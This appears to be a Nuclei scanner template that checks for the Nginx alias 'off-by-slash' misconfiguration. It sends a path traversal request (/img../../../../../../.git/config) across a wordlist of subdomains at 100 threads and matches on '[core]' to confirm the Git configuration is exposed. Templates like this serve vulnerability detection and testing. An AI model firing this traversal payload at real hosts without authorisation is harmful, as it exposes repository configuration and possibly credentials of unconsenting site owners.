id: git-config-nginxoffbyslash 3
info:
  name: Nginx off-by-slash exposes Git config
  author: organiccrap
  severity: medium
  description: Nginx off-by-slash vulnerability exposes Git configuration.
  tags: config,exposure
  reference: |
    - https://twitter.com/Random_Robbie/status/1262676628167110656
    - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /img../../../../../../.git/config HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - '[core]'
